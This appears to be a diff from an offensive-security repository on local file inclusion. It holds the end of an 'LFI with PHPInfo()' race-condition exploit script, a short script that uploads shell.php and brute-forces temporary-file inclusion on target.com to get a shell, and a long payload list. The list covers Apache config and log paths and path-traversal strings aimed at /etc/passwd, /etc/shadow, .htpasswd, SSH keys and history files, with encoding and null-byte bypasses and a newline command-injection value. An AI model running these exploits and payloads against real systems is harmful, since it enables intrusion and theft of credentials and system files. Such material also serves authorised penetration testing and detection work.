s.connect((host,port))
|
||||
s.send(phpinforeq)
|
||||
|
||||
d = ""
|
||||
while True:
|
||||
i = s.recv(4096)
|
||||
d+=i
|
||||
if i == "":
|
||||
break
|
||||
# detect the final chunk
|
||||
if i.endswith("0\r\n\r\n"):
|
||||
break
|
||||
s.close()
|
||||
i = d.find("[tmp_name] =>")
|
||||
if i == -1:
|
||||
i = d.find("[tmp_name] =>")
|
||||
if i == -1:
|
||||
raise ValueError("No php tmp_name in phpinfo output")
|
||||
|
||||
print("found %s at %i" % (d[i:i+10],i))
|
||||
# padded up a bit
|
||||
return i+256
|
||||
|
||||
def main():
|
||||
|
||||
print("LFI With PHPInfo()")
|
||||
print("-=" * 30)
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print("Usage: %s host [port] [threads]" % sys.argv[0])
|
||||
sys.exit(1)
|
||||
|
||||
try:
|
||||
host = socket.gethostbyname(sys.argv[1])
|
||||
except socket.error as e:
|
||||
print("Error with hostname %s: %s" % (sys.argv[1], e))
|
||||
sys.exit(1)
|
||||
|
||||
port=80
|
||||
try:
|
||||
port = int(sys.argv[2])
|
||||
except IndexError:
|
||||
pass
|
||||
except ValueError as e:
|
||||
print("Error with port %d: %s" % (sys.argv[2], e))
|
||||
sys.exit(1)
|
||||
|
||||
poolsz=10
|
||||
try:
|
||||
poolsz = int(sys.argv[3])
|
||||
except IndexError:
|
||||
pass
|
||||
except ValueError as e:
|
||||
print("Error with poolsz %d: %s" % (sys.argv[3], e))
|
||||
sys.exit(1)
|
||||
|
||||
print("Getting initial offset...", end=' ')
|
||||
reqphp, tag, reqlfi = setup(host, port)
|
||||
offset = getOffset(host, port, reqphp)
|
||||
sys.stdout.flush()
|
||||
|
||||
maxattempts = 1000
|
||||
e = threading.Event()
|
||||
l = threading.Lock()
|
||||
|
||||
print("Spawning worker pool (%d)..." % poolsz)
|
||||
sys.stdout.flush()
|
||||
|
||||
tp = []
|
||||
for i in range(0,poolsz):
|
||||
tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
|
||||
|
||||
for t in tp:
|
||||
t.start()
|
||||
try:
|
||||
while not e.wait(1):
|
||||
if e.is_set():
|
||||
break
|
||||
with l:
|
||||
sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
|
||||
sys.stdout.flush()
|
||||
if counter >= maxattempts:
|
||||
break
|
||||
print()
|
||||
if e.is_set():
|
||||
print("Woot! \m/")
|
||||
else:
|
||||
print(":(")
|
||||
except KeyboardInterrupt:
|
||||
print("\nTelling threads to shutdown...")
|
||||
e.set()
|
||||
|
||||
print("Shuttin' down...")
|
||||
for t in tp:
|
||||
t.join()
|
||||
|
||||
if __name__=="__main__":
|
||||
print("Don't forget to modify the LFI URL")
|
||||
main()
|
|
@ -0,0 +1,22 @@
|
|||
from __future__ import print_function
|
||||
from builtins import range
|
||||
import itertools
|
||||
import requests
|
||||
import string
|
||||
import sys
|
||||
|
||||
print('[+] Trying to win the race')
|
||||
f = {'file': open('shell.php', 'rb')}
|
||||
for _ in range(4096 * 4096):
|
||||
requests.post('http://target.com/index.php?c=index.php', f)
|
||||
|
||||
|
||||
print('[+] Bruteforcing the inclusion')
|
||||
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
|
||||
url = 'http://target.com/index.php?c=/tmp/php' + fname
|
||||
r = requests.get(url)
|
||||
if 'load average' in r.text: # <?php echo system('uptime');
|
||||
print('[+] We have got a shell: ' + url)
|
||||
sys.exit(0)
|
||||
|
||||
print('[x] Something went wrong, please try again')
|
|
@ -0,0 +1,13 @@
|
|||
/usr/pkg/etc/httpd/httpd.conf
|
||||
/usr/local/etc/apache22/httpd.conf
|
||||
/usr/local/etc/apache2/httpd.conf
|
||||
/var/www/conf/httpd.conf
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/access_log
|
||||
/etc/apache2/httpd2.conf
|
||||
/var/apache2/logs/error_log
|
||||
/var/apache2/logs/access_log
|
||||
/var/log/httpd-error.log
|
||||
/var/log/httpd-access.log
|
||||
/var/log/httpd/error_log
|
||||
/var/log/httpd/access_log
|
|
@ -0,0 +1,879 @@
|
|||
/.../.../.../.../.../
|
||||
\…..\\\…..\\\…..\\\
|
||||
%00../../../../../../etc/passwd
|
||||
%00/etc/passwd%00
|
||||
%00../../../../../../etc/shadow
|
||||
%00/etc/shadow%00
|
||||
%0a/bin/cat%20/etc/passwd
|
||||
%0a/bin/cat%20/etc/shadow
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
||||
/../../../../../../../../%2A
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
||||
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
||||
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
|
||||
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
|
||||
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
|
||||
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
|
||||
=3D “/..” . “%2f..
|
||||
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
|
||||
admin/access_log
|
||||
/admin/install.php
|
||||
../../../administrator/inbox
|
||||
/apache2/logs/access_log
|
||||
/apache2/logs/access.log
|
||||
/apache2/logs/error_log
|
||||
/apache2/logs/error.log
|
||||
/apache/logs/access_log
|
||||
/apache/logs/access.log
|
||||
../../../../../apache/logs/access.log
|
||||
../../../../apache/logs/access.log
|
||||
../../../apache/logs/access.log
|
||||
../../apache/logs/access.log
|
||||
../apache/logs/access.log
|
||||
/apache/logs/error_log
|
||||
/apache/logs/error.log
|
||||
../../../../../apache/logs/error.log
|
||||
../../../../apache/logs/error.log
|
||||
../../../apache/logs/error.log
|
||||
../../apache/logs/error.log
|
||||
../apache/logs/error.log
|
||||
/apache\php\php.ini
|
||||
\\'/bin/cat%20/etc/passwd\\'
|
||||
\\'/bin/cat%20/etc/shadow\\'
|
||||
/.bash_history
|
||||
/.bash_profile
|
||||
/.bashrc
|
||||
/../../../../../../../../bin/id|
|
||||
/bin/php.ini
|
||||
/boot/grub/grub.conf
|
||||
/./././././././././././boot.ini
|
||||
/../../../../../../../../../../../boot.ini
|
||||
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
||||
..//..//..//..//..//boot.ini
|
||||
../../../../../../../../../../../../boot.ini
|
||||
../../boot.ini
|
||||
..\../..\../..\../..\../boot.ini
|
||||
..\../..\../boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00
|
||||
../../../../../../../../../../../../boot.ini%00
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
||||
/../../../../../../../../../../../boot.ini%00.html
|
||||
/../../../../../../../../../../../boot.ini%00.jpg
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
|
||||
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
||||
c:\apache\logs\access.log
|
||||
c:\apache\logs\error.log
|
||||
c:\AppServ\MySQL
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
/C:/inetpub/ftproot/
|
||||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
c:\inetpub\wwwroot\index.asp
|
||||
/config.asp
|
||||
../config.asp
|
||||
config.asp
|
||||
../config.inc.php
|
||||
config.inc.php
|
||||
../config.js
|
||||
config.js
|
||||
_config.php
|
||||
../_config.php
|
||||
../config.php
|
||||
config.php
|
||||
../_config.php%00
|
||||
../../../../../../../../conf/server.xml
|
||||
/core/config.php
|
||||
/C:\Program Files\
|
||||
c:\Program Files\Apache Group\Apache\logs\access.log
|
||||
c:\Program Files\Apache Group\Apache\logs\error.log
|
||||
/.cshrc
|
||||
c:\System32\Inetsrv\metabase.xml
|
||||
c:WINDOWS/system32/
|
||||
d:\AppServ\MySQL
|
||||
database.asp
|
||||
database.js
|
||||
database.php
|
||||
data.php
|
||||
dbase.php a
|
||||
db.php
|
||||
../../../../../../../dev
|
||||
/D:\Program Files\
|
||||
d:\System32\Inetsrv\metabase.xml
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/conf/httpd.conf
|
||||
/etc/apache2/httpd.conf
|
||||
/etc/apache2/sites-available/default
|
||||
/etc/apache2/vhosts.d/default_vhost.include
|
||||
/etc/apache/apache.conf
|
||||
/etc/apache/conf/httpd.conf
|
||||
/etc/apache/httpd.conf
|
||||
/etc/apt/sources.list
|
||||
/etc/chrootUsers
|
||||
/etc/crontab
|
||||
/etc/defaultdomain
|
||||
/etc/default/passwd
|
||||
/etc/defaultrouter
|
||||
/etc/fstab
|
||||
/etc/ftpchroot
|
||||
/etc/ftphosts
|
||||
/etc/group
|
||||
/etc/hostname.bge
|
||||
/etc/hostname.ce0
|
||||
/etc/hostname.ce1
|
||||
/etc/hostname.ce2
|
||||
/etc/hostname.ce3
|
||||
/etc/hostname.dcelx0
|
||||
/etc/hostname.dcelx1
|
||||
/etc/hostname.dcelx2
|
||||
/etc/hostname.dcelx3
|
||||
/etc/hostname.dmfe0
|
||||
/etc/hostname.dmfe1
|
||||
/etc/hostname.dmfe2
|
||||
/etc/hostname.dmfe3
|
||||
/etc/hostname.dnet0
|
||||
/etc/hostname.dnet1
|
||||
/etc/hostname.dnet2
|
||||
/etc/hostname.dnet3
|
||||
/etc/hostname.ecn0
|
||||
/etc/hostname.ecn1
|
||||
/etc/hostname.ecn2
|
||||
/etc/hostname.ecn3
|
||||
/etc/hostname.elx0
|
||||
/etc/hostname.elx1
|
||||
/etc/hostname.elx2
|
||||
/etc/hostname.elx3
|
||||
/etc/hostname.elxl0
|
||||
/etc/hostname.elxl1
|
||||
/etc/hostname.elxl2
|
||||
/etc/hostname.elxl3
|
||||
/etc/hostname.eri0
|
||||
/etc/hostname.eri1
|
||||
/etc/hostname.eri2
|
||||
/etc/hostname.eri3
|
||||
/etc/hostname.ge0
|
||||
/etc/hostname.ge1
|
||||
/etc/hostname.ge2
|
||||
/etc/hostname.ge3
|
||||
/etc/hostname.hme0
|
||||
/etc/hostname.hme1
|
||||
/etc/hostname.hme2
|
||||
/etc/hostname.hme3
|
||||
/etc/hostname.ieef0
|
||||
/etc/hostname.ieef1
|
||||
/etc/hostname.ieef2
|
||||
/etc/hostname.ieef3
|
||||
/etc/hostname.iprb0
|
||||
/etc/hostname.iprb1
|
||||
/etc/hostname.iprb2
|
||||
/etc/hostname.iprb3
|
||||
/etc/hostname.le0
|
||||
/etc/hostname.le1
|
||||
/etc/hostname.le2
|
||||
/etc/hostname.le3
|
||||
/etc/hostname.lo
|
||||
/etc/hostname.pcn0
|
||||
/etc/hostname.pcn1
|
||||
/etc/hostname.pcn2
|
||||
/etc/hostname.pcn3
|
||||
/etc/hostname.qfe0
|
||||
/etc/hostname.qfe1
|
||||
/etc/hostname.qfe2
|
||||
/etc/hostname.qfe3
|
||||
/etc/hostname.spwr0
|
||||
/etc/hostname.spwr1
|
||||
/etc/hostname.spwr2
|
||||
/etc/hostname.spwr3
|
||||
/etc/hosts
|
||||
../../../../../../../../../../../../etc/hosts
|
||||
../../../../../../../../../../../../etc/hosts%00
|
||||
/etc/hosts.allow
|
||||
/etc/hosts.deny
|
||||
/etc/hosts.equiv
|
||||
/etc/http/conf/httpd.conf
|
||||
/etc/httpd.conf
|
||||
/etc/httpd/conf.d/php.conf
|
||||
/etc/httpd/conf.d/squirrelmail.conf
|
||||
/etc/httpd/conf.d/ssl.conf
|
||||
/etc/httpd/conf/httpd.conf
|
||||
/etc/httpd/httpd.conf
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces.log
|
||||
../../../../../../../etc/httpd/logs/acces_log
|
||||
../../../../../../../etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/access_log
|
||||
/etc/httpd/logs/access.log
|
||||
../../../../../etc/httpd/logs/access_log
|
||||
../../../../../etc/httpd/logs/access.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error.log
|
||||
../../../../../../../etc/httpd/logs/error_log
|
||||
../../../../../../../etc/httpd/logs/error.log
|
||||
../../../../../etc/httpd/logs/error_log
|
||||
../../../../../etc/httpd/logs/error.log
|
||||
/etc/httpd/php.ini
|
||||
/etc/http/httpd.conf
|
||||
/etc/inetd.conf
|
||||
/etc/init.d/apache
|
||||
/etc/init.d/apache2
|
||||
/etc/issue
|
||||
/etc/logrotate.d/ftp
|
||||
/etc/logrotate.d/httpd
|
||||
/etc/logrotate.d/proftpd
|
||||
/etc/logrotate.d/vsftpd.log
|
||||
/etc/mail/access
|
||||
/etc/mailman/mm_cfg.py
|
||||
/etc/make.conf
|
||||
/etc/master.passwd
|
||||
/etc/motd
|
||||
/etc/my.cnf
|
||||
/etc/mysql/my.cnf
|
||||
/etc/netconfig
|
||||
/etc/nsswitch.conf
|
||||
/etc/opt/ipf/ipf.conf
|
||||
/etc/opt/ipf/ipnat.conf
|
||||
/./././././././././././etc/passwd
|
||||
/../../../../../../../../../../etc/passwd
|
||||
/../../../../../../../../../../etc/passwd^^
|
||||
/..\../..\../..\../..\../..\../..\../etc/passwd
|
||||
/etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../etc/passwd
|
||||
../../../../../../../../etc/passwd
|
||||
../../../../../../../etc/passwd
|
||||
../../../../../../etc/passwd
|
||||
../../../../../etc/passwd
|
||||
../../../../etc/passwd
|
||||
../../../etc/passwd
|
||||
../../etc/passwd
|
||||
../etc/passwd
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
etc/passwd
|
||||
/etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../etc/passwd%00
|
||||
../../../../../../../etc/passwd%00
|
||||
../../../../../../etc/passwd%00
|
||||
../../../../../etc/passwd%00
|
||||
../../../../etc/passwd%00
|
||||
../../../etc/passwd%00
|
||||
../../etc/passwd%00
|
||||
../etc/passwd%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
/../../../../../../../../../../../etc/passwd%00.html
|
||||
/../../../../../../../../../../../etc/passwd%00.jpg
|
||||
../../../../../../etc/passwd&=%3C%3C%3C%3C
|
||||
/etc/php4.4/fcgi/php.ini
|
||||
/etc/php4/apache2/php.ini
|
||||
/etc/php4/apache/php.ini
|
||||
/etc/php4/cgi/php.ini
|
||||
/etc/php5/apache2/php.ini
|
||||
/etc/php5/apache/php.ini
|
||||
/etc/php5/cgi/php.ini
|
||||
/etc/php/apache2/php.ini
|
||||
/etc/php/apache/php.ini
|
||||
/etc/php/cgi/php.ini
|
||||
/etc/php.d/dom.ini
|
||||
/etc/php.d/gd.ini
|
||||
/etc/php.d/imap.ini
|
||||
/etc/php.d/json.ini
|
||||
/etc/php.d/ldap.ini
|
||||
/etc/php.d/mbstring.ini
|
||||
/etc/php.d/mysqli.ini
|
||||
/etc/php.d/mysql.ini
|
||||
/etc/php.d/odbc.ini
|
||||
/etc/php.d/pdo.ini
|
||||
/etc/php.d/pdo_mysql.ini
|
||||
/etc/php.d/pdo_odbc.ini
|
||||
/etc/php.d/pdo_pgsql.ini
|
||||
/etc/php.d/pdo_sqlite.ini
|
||||
/etc/php.d/pgsql.ini
|
||||
/etc/php.d/xmlreader.ini
|
||||
/etc/php.d/xmlwriter.ini
|
||||
/etc/php.d/xsl.ini
|
||||
/etc/php.d/zip.ini
|
||||
/etc/php.ini
|
||||
/etc/php/php4/php.ini
|
||||
/etc/php/php.ini
|
||||
/etc/postfix/mydomains
|
||||
/etc/proftp.conf
|
||||
/etc/proftpd/modules.conf
|
||||
/etc/protpd/proftpd.conf
|
||||
/etc/pure-ftpd.conf
|
||||
/etc/pureftpd.passwd
|
||||
/etc/pureftpd.pdb
|
||||
/etc/pure-ftpd/pure-ftpd.conf
|
||||
/etc/pure-ftpd/pure-ftpd.pdb
|
||||
/etc/pure-ftpd/pureftpd.pdb
|
||||
/etc/release
|
||||
/etc/resolv.conf
|
||||
/etc/rpc
|
||||
/etc/security/environ
|
||||
/etc/security/failedlogin
|
||||
/etc/security/group
|
||||
/etc/security/lastlog
|
||||
/etc/security/limits
|
||||
/etc/security/passwd
|
||||
/etc/security/user
|
||||
/./././././././././././etc/shadow
|
||||
/../../../../../../../../../../etc/shadow
|
||||
/../../../../../../../../../../etc/shadow^^
|
||||
/..\../..\../..\../..\../..\../..\../etc/shadow
|
||||
/etc/shadow
|
||||
../../../../../../../../../../../../etc/shadow
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
|
||||
../../../../../../../../../../../../etc/shadow%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
etc/shadow%00
|
||||
/etc/ssh/sshd_config
|
||||
/etc/sudoers
|
||||
/etc/syslog.conf
|
||||
/etc/syslogd.conf
|
||||
/etc/system
|
||||
/etc/updatedb.conf
|
||||
/etc/utmp
|
||||
/etc/vfstab
|
||||
/etc/vhcs2/proftpd/proftpd.conf
|
||||
/etc/vsftpd.chroot_list
|
||||
/etc/vsftpd.conf
|
||||
/etc/vsftpd/vsftpd.conf
|
||||
/etc/wtmp
|
||||
/etc/wu-ftpd/ftpaccess
|
||||
/etc/wu-ftpd/ftphosts
|
||||
/etc/wu-ftpd/ftpusers
|
||||
/.forward
|
||||
/home2\bin\stable\apache\php.ini
|
||||
/home/apache/conf/httpd.conf
|
||||
/home/apache/httpd.conf
|
||||
/home\bin\stable\apache\php.ini
|
||||
/.htpasswd
|
||||
.htpasswd
|
||||
../.htpasswd
|
||||
../install.php
|
||||
install.php
|
||||
../../../../../../../../../../../../localstart.asp
|
||||
../../../../../../../../../../../../localstart.asp%00
|
||||
/log/miscDir/accesslog
|
||||
/.logout
|
||||
/logs/access_log
|
||||
/logs/access.log
|
||||
../../../../../logs/access.log
|
||||
../../../../logs/access.log
|
||||
../../../logs/access.log
|
||||
../../logs/access.log
|
||||
../logs/access.log
|
||||
/logs/error_log
|
||||
/logs/error.log
|
||||
../../../../../logs/error.log
|
||||
../../../../logs/error.log
|
||||
../../../logs/error.log
|
||||
../../logs/error.log
|
||||
../logs/error.log
|
||||
/logs/pure-ftpd.log
|
||||
/master.passwd
|
||||
member/.htpasswd
|
||||
members/.htpasswd
|
||||
/.netrc
|
||||
/NetServer\bin\stable\apache\php.ini
|
||||
/opt/apache2/conf/httpd.conf
|
||||
/opt/apache/conf/httpd.conf
|
||||
/opt/lampp/logs/access_log
|
||||
/opt/lampp/logs/access.log
|
||||
/opt/lampp/logs/error_log
|
||||
/opt/lampp/logs/error.log
|
||||
/opt/xampp/etc/php.ini
|
||||
/opt/xampp/logs/access_log
|
||||
/opt/xampp/logs/access.log
|
||||
/opt/xampp/logs/error_log
|
||||
/opt/xampp/logs/error.log
|
||||
.pass
|
||||
../.pass
|
||||
pass.dat
|
||||
passwd
|
||||
/.passwd
|
||||
.passwd
|
||||
../.passwd
|
||||
passwd.dat
|
||||
/php4\php.ini
|
||||
/php5\php.ini
|
||||
/php\php.ini
|
||||
/PHP\php.ini
|
||||
/private/etc/httpd/httpd.conf
|
||||
/private/etc/httpd/httpd.conf.default
|
||||
/proc/cpuinfo
|
||||
/proc/interrupts
|
||||
/proc/loadavg
|
||||
/proc/meminfo
|
||||
/proc/mounts
|
||||
/proc/net/arp
|
||||
/proc/net/dev
|
||||
/proc/net/route
|
||||
/proc/net/tcp
|
||||
/proc/partitions
|
||||
/proc/self/cmdline
|
||||
/proc/self/envron
|
||||
/proc/version
|
||||
/.profile
|
||||
/Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache\logs\access.log
|
||||
/Program Files\Apache Group\Apache\logs\error.log
|
||||
/Program Files\xampp\apache\conf\httpd.conf
|
||||
/../../../../pswd
|
||||
/.rhosts
|
||||
/root/.bash_history
|
||||
/root/.bash_logut
|
||||
root/.htpasswd
|
||||
/root/.ksh_history
|
||||
/root/.Xauthority
|
||||
/.sh_history
|
||||
/.shosts
|
||||
/.ssh/authorized_keys
|
||||
user/.htpasswd
|
||||
../users.db.php
|
||||
users.db.php
|
||||
users/.htpasswd
|
||||
/usr/apache2/conf/httpd.conf
|
||||
/usr/apache/conf/httpd.conf
|
||||
/usr/etc/pure-ftpd.conf
|
||||
/usr/lib/cron/log
|
||||
/usr/lib/php.ini
|
||||
/usr/lib/php/php.ini
|
||||
/usr/lib/security/mkuser.default
|
||||
/usr/local/apache2/conf/httpd.conf
|
||||
/usr/local/apache2/httpd.conf
|
||||
/usr/local/apache2/logs/access_log
|
||||
/usr/local/apache2/logs/access.log
|
||||
/usr/local/apache2/logs/error_log
|
||||
/usr/local/apache2/logs/error.log
|
||||
/usr/local/apache/conf/httpd.conf
|
||||
/usr/local/apache/conf/php.ini
|
||||
/usr/local/apache/httpd.conf
|
||||
/usr/local/apache/log
|
||||
/usr/local/apache/logs
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access_ log
|
||||
/usr/local/apache/logs/access.log
|
||||
/usr/local/apache/logs/access. log
|
||||
../../../../../../../usr/local/apache/logs/access_ log
|
||||
../../../../../../../usr/local/apache/logs/access. log
|
||||
../../../../../usr/local/apache/logs/access_log
|
||||
../../../../../usr/local/apache/logs/access.log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error.log
|
||||
../../../../../../../usr/local/apache/logs/error_l og
|
||||
../../../../../../../usr/local/apache/logs/error.l og
|
||||
../../../../../usr/local/apache/logs/error_log
|
||||
../../../../../usr/local/apache/logs/error.log
|
||||
/usr/local/apps/apache2/conf/httpd.conf
|
||||
/usr/local/apps/apache/conf/httpd.conf
|
||||
/usr/local/cpanel/logs
|
||||
/usr/local/cpanel/logs/access_log
|
||||
/usr/local/cpanel/logs/error_log
|
||||
/usr/local/cpanel/logs/license_log
|
||||
/usr/local/cpanel/logs/login_log
|
||||
/usr/local/cpanel/logs/stats_log
|
||||
/usr/local/etc/apache2/conf/httpd.conf
|
||||
/usr/local/etc/apache/conf/httpd.conf
|
||||
/usr/local/etc/apache/vhosts.conf
|
||||
/usr/local/etc/httpd/conf/httpd.conf
|
||||
/usr/local/etc/httpd/logs/access_log
|
||||
/usr/local/etc/httpd/logs/error_log
|
||||
/usr/local/etc/php.ini
|
||||
/usr/local/etc/pure-ftpd.conf
|
||||
/usr/local/etc/pureftpd.pdb
|
||||
/usr/local/httpd/conf/httpd.conf
|
||||
/usr/local/lib/php.ini
|
||||
/usr/local/php4/httpd.conf
|
||||
/usr/local/php4/httpd.conf.php
|
||||
/usr/local/php4/lib/php.ini
|
||||
/usr/local/php5/httpd.conf
|
||||
/usr/local/php5/httpd.conf.php
|
||||
/usr/local/php5/lib/php.ini
|
||||
/usr/local/php/httpd.conf
|
||||
/usr/local/php/httpd.conf.php
|
||||
/usr/local/php/lib/php.ini
|
||||
/usr/local/pureftpd/etc/pure-ftpd.conf
|
||||
/usr/local/pureftpd/etc/pureftpd.pdb
|
||||
/usr/local/pureftpd/sbin/pure-config.pl
|
||||
/usr/local/www/logs/thttpd_log
|
||||
/usr/local/Zend/etc/php.ini
|
||||
/usr/pkgsrc/net/pureftpd/
|
||||
/usr/ports/contrib/pure-ftpd/
|
||||
/usr/ports/ftp/pure-ftpd/
|
||||
/usr/ports/net/pure-ftpd/
|
||||
/usr/sbin/pure-config.pl
|
||||
/usr/spool/lp/log
|
||||
/usr/spool/mqueue/syslog
|
||||
/var/adm
|
||||
/var/adm/acct/sum/loginlog
|
||||
/var/adm/aculog
|
||||
/var/adm/aculogs
|
||||
/var/adm/crash/unix
|
||||
/var/adm/crash/vmcore
|
||||
/var/adm/cron/log
|
||||
/var/adm/dtmp
|
||||
/var/adm/lastlog
|
||||
/var/adm/lastlog/username
|
||||
/var/adm/log/asppp.log
|
||||
/var/adm/loginlog
|
||||
/var/adm/log/xferlog
|
||||
/var/adm/lp/lpd-errs
|
||||
/var/adm/messages
|
||||
/var/adm/pacct
|
||||
/var/adm/qacct
|
||||
/var/adm/ras/bootlog
|
||||
/var/adm/ras/errlog
|
||||
/var/adm/sulog
|
||||
/var/adm/SYSLOG
|
||||
/var/adm/utmp
|
||||
/var/adm/utmpx
|
||||
/var/adm/vold.log
|
||||
/var/adm/wtmp
|
||||
/var/adm/wtmpx
|
||||
/var/adm/X0msgs
|
||||
/var/apache/log
|
||||
/var/apache/logs
|
||||
/var/apache/logs/access_log
|
||||
/var/apache/logs/error_log
|
||||
/var/cpanel/cpanel.config
|
||||
/var/cron/log
|
||||
/var/lib/mlocate/mlocate.db
|
||||
/var/lib/mysql/my.cnf
|
||||
/var/local/www/conf/php.ini
|
||||
/var/lock/samba
|
||||
/var/log
|
||||
/var/log/access_log
|
||||
/var/log/access.log
|
||||
../../../../../../../var/log/access_log
|
||||
../../../../../../../var/log/access.log
|
||||
../../../../../var/log/access_log
|
||||
/var/log/acct
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache2/access.log
|
||||
../../../../../../../var/log/apache2/access_log
|
||||
../../../../../../../var/log/apache2/access.log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache2/error.log
|
||||
../../../../../../../var/log/apache2/error_log
|
||||
../../../../../../../var/log/apache2/error.log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache/access.log
|
||||
../../../../../../../var/log/apache/access_log
|
||||
../../../../../../../var/log/apache/access.log
|
||||
../../../../../var/log/apache/access_log
|
||||
../../../../../var/log/apache/access.log
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache/error.log
|
||||
../../../../../../../var/log/apache/error_log
|
||||
../../../../../../../var/log/apache/error.log
|
||||
../../../../../var/log/apache/error_log
|
||||
../../../../../var/log/apache/error.log
|
||||
/var/log/apache-ssl/access.log
|
||||
/var/log/apache-ssl/error.log
|
||||
/var/log/auth
|
||||
/var/log/authlog
|
||||
